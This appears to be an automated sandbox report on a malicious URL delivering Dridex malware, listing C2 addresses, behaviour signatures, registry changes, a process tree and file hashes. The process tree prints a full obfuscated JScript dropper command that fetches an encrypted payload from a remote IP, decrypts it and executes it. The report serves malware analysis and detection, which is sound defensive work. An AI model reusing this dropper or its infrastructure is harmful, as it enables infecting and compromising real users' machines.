Analysis
-
max time kernel
123s -
max time network
147s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
07-10-2021 13:40
Static task
static1
URLScan task
urlscan1
Sample
https://ankltrafficexit.xyz/trafficexit
Behavioral task
behavioral1
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win7v20210408
Behavioral task
behavioral3
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win10-ja-20210920
General
Malware Config
Extracted
dridex
10111
184.168.147.173:6225
212.112.86.37:9676
72.52.96.202:8194
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
wscript.exeflow pid process 28 1184 wscript.exe 35 1184 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
x9h1p.exepid process 2128 x9h1p.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
x9h1p.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA x9h1p.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "340379011" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "340427597" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "340395605" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A439BAFB-29CF-11EC-AF2E-EE29200C20B6} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
iexplore.exepid process 2428 iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 2428 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 2428 iexplore.exe 2428 iexplore.exe 1312 IEXPLORE.EXE 1312 IEXPLORE.EXE 1312 IEXPLORE.EXE 1312 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
iexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exedescription pid process target process PID 2428 wrote to memory of 1312 2428 iexplore.exe IEXPLORE.EXE PID 2428 wrote to memory of 1312 2428 iexplore.exe IEXPLORE.EXE PID 2428 wrote to memory of 1312 2428 iexplore.exe IEXPLORE.EXE PID 1312 wrote to memory of 2084 1312 IEXPLORE.EXE cmd.exe PID 1312 wrote to memory of 2084 1312 IEXPLORE.EXE cmd.exe PID 1312 wrote to memory of 2084 1312 IEXPLORE.EXE cmd.exe PID 2084 wrote to memory of 1184 2084 cmd.exe wscript.exe PID 2084 wrote to memory of 1184 2084 cmd.exe wscript.exe PID 2084 wrote to memory of 1184 2084 cmd.exe wscript.exe PID 1184 wrote to memory of 1680 1184 wscript.exe cmd.exe PID 1184 wrote to memory of 1680 1184 wscript.exe cmd.exe PID 1184 wrote to memory of 1680 1184 wscript.exe cmd.exe PID 1680 wrote to memory of 2128 1680 cmd.exe x9h1p.exe PID 1680 wrote to memory of 2128 1680 cmd.exe x9h1p.exe PID 1680 wrote to memory of 2128 1680 cmd.exe x9h1p.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2428 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://188.227.84.6/?NDQzODU5&afXe&cxssdvxcv=99tstreet.95dk98.406q5j2w3&dsfdffg43t=6dDKUfYH1iJz5Ga3fqSCZ39JHT109zUSkrx6B2aClzh8qIpLrtRaFbg2UXUeAdon9wJUF4Ro_uth0jVnBeViJDU_hGNaVhH_6KQEbMLhR32zIE&sdfsdfdfg=diet&fhfghddfsdf=cars&ogfgafgn4=wn_QMvXcLhXQFYPDJf7cT&VdzzNngefMTk1NDE=" "2""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://188.227.84.6/?NDQzODU5&afXe&cxssdvxcv=99tstreet.95dk98.406q5j2w3&dsfdffg43t=6dDKUfYH1iJz5Ga3fqSCZ39JHT109zUSkrx6B2aClzh8qIpLrtRaFbg2UXUeAdon9wJUF4Ro_uth0jVnBeViJDU_hGNaVhH_6KQEbMLhR32zIE&sdfsdfdfg=diet&fhfghddfsdf=cars&ogfgafgn4=wn_QMvXcLhXQFYPDJf7cT&VdzzNngefMTk1NDE=" "2""4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c x9h1p.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\x9h1p.exex9h1p.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506MD5
ab5c36d10261c173c5896f3478cdc6b7
SHA187ac53810ad125663519e944bc87ded3979cbee4
SHA256f8e90fb0557fe49d7702cfb506312ac0b24c97802f9c782696db6d47f434e8e9
SHA512e83e4eae44e7a9cbcd267dbfc25a7f4f68b50591e3bbe267324b1f813c9220d565b284994ded5f7d2d371d50e1ebfa647176ec8de9716f754c6b5785c6e897fa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506MD5
9550927d3cdd8759b42e4a455262abe8
SHA102a79355cfe1220ac370b3cf70beecbf3213a792
SHA256755e1ce80240c08b187afc0c31e00ad764eb2e6bd65ac1a6b9f43c3c58357fb1
SHA512d8292f6b6efd7b88af65b5aeff8c145cc1f0e14171bfe8c36c19fdaa2e2d9f8430e9f6f54e083815429a4bc59a48b190a8e3868e9cabfa4689f12bbc84ce593a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\B87R0PE2.cookieMD5
dcc6cda2e48602bb6874ea30acbb151c
SHA16d6db5811b85036e3c0f3a860d6699931808c718
SHA25687622a1d6eb3ba97b58e392c6a37f4bcb46f611c9f2bc6df359dbbd820832b19
SHA5129b46336c7efa87062885afed0002c26bc4fe6de856f473edc410931e9f987fb440e21e4c63b4ac32ee5c27c7104629635e4d94b51ce5b283327ab3614f0895f8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\QCE12I6O.cookieMD5
d597ffd0be5b02ec5a476104f1550656
SHA16a2d9e6462e3c060b7dda5c79c1cba9422796989
SHA2562ac85fc2f4562e14ef7a342c2b830b060b78f1052991b2b222cf1b16f83285fa
SHA51220834961a5957068046a5bd6fb051e7b8f5566a789fdf6f22d3168bb61fc3c80ddffb4462695aa1db1ac0e1fd66545cf606c4b9a761be32970a5e9b8ec85ed51
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
60fc00422b399db85f87d41b8328976d
SHA1bb85034acad8025f97e5bb236443debaf8926e4b
SHA256c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
SHA51216fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
-
C:\Users\Admin\AppData\Local\Temp\x9h1p.exeMD5
180e683c3799142585055ee224b7c25c
SHA1c8f21d45604849300c696d4964cb53472b37ef85
SHA256fcc960a3ef036d543343647c38c9b90fac965ce6158e7d1f246ba457972f65c6
SHA512c07cc11db3f8fcf39773e548e852694871a6479a66c45230322708e1177532647fa9db58b9edd06278192f7877ffd3aac7ce5a462f6019df850d324a60c583d2
-
C:\Users\Admin\AppData\Local\Temp\x9h1p.exeMD5
180e683c3799142585055ee224b7c25c
SHA1c8f21d45604849300c696d4964cb53472b37ef85
SHA256fcc960a3ef036d543343647c38c9b90fac965ce6158e7d1f246ba457972f65c6
SHA512c07cc11db3f8fcf39773e548e852694871a6479a66c45230322708e1177532647fa9db58b9edd06278192f7877ffd3aac7ce5a462f6019df850d324a60c583d2
-
memory/1184-170-0x0000000000000000-mapping.dmp
-
memory/1312-140-0x0000000000000000-mapping.dmp
-
memory/1680-176-0x0000000000000000-mapping.dmp
-
memory/2084-169-0x0000000000000000-mapping.dmp
-
memory/2128-180-0x0000000000470000-0x00000000005BA000-memory.dmpFilesize
1.3MB
-
memory/2128-177-0x0000000000000000-mapping.dmp
-
memory/2128-181-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/2428-132-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-166-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-134-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-136-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-137-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-138-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-115-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-141-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-142-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-144-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-145-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-147-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-149-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-150-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-151-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-155-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-156-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-157-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-163-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-164-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-167-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-133-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-165-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-168-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-131-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-129-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-128-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-172-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-127-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-125-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-124-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-123-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-121-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-122-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-120-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-119-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-184-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-185-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-188-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-189-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-190-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-117-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2428-116-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB